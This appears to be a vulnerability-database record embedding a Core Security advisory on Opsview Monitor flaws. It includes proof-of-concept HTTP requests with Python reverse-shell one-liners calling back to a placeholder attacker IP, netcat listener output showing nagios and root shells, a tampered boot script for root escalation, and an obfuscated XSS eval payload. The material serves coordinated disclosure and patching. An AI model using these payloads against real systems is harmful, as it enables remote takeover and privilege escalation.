opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16148",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17455",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16148",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"id": "VAR-201809-0906",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
}
]
},
"last_update_date": "2023-12-18T12:01:17.640000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139517"
},
{
"title": "Opsview Monitor Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84509"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16148"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%2foiiplzt1c2vybmftzsa9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3zhcib4ahiyid0gbmv3ifhnteh0dhbszxf1zxn0kck7eghymi5vcgvukcdqt1nujywgjy9yzxn0l2nvbmzpzy9ub3rpzmljyxrpb25tzxrob2qvdgvzdg5vdglmawnhdglvbi8nlcb0cnvlktt4ahiylnnldfjlcxvlc3rizwfkzxioingtb3bzdmlldy11c2vybmftzsisihvzzxjuyw1lkttjb25zb2xllmxvzyh1c2vybmftzsk7y29uc29szs5sb2codg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiec1vchn2awv3lxrva2vuiiwgdg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiq29udgvudc1uexbliiwgimfwcgxpy2f0aw9ul2pzb24ikttib2r5id0geyjtzxnzywdlijoivgvzdcbnzxnzywdliiwiy29tbwfuzci6inn1ym1pdf94bxbwx3njcmlwdcisinzhcmlhymxlcyi6w10sinrlc3rfdmfyawfibgvzijpbeyjuyw1lijoiuefhrviilcj2ywx1zsi6ijeymzeymzeymyb8fcbwexrob24glwmgj2ltcg9ydcbzb2nrzxqsc3vichjvy2vzcyxvcztzpxnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsc29ja2v0llnpq0tfu1rsrufnkttzlmnvbm5ly3qokfwipgf0dgfja2vysva%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:03.063000",
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"date": "2018-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"date": "2018-11-13T14:41:15.413000",
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"date": "2018-09-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
],
"trust": 2.0
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
],
"trust": 0.7
}
}
VAR-201809-0903
Vulnerability from variot - Updated: 2023-12-18 12:01The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance. Opsview Monitor Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a local privilege escalation vulnerability that allows an attacker to gain full control of a device by upgrading its privileges from nagios users to root after the system is restarted. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user.
7.1. Reflected Cross-Site Scripting in Diagnostics
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/
7.2. Persistent Cross-Site Scripting in Settings endpoint
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability:
/----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. However, this vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
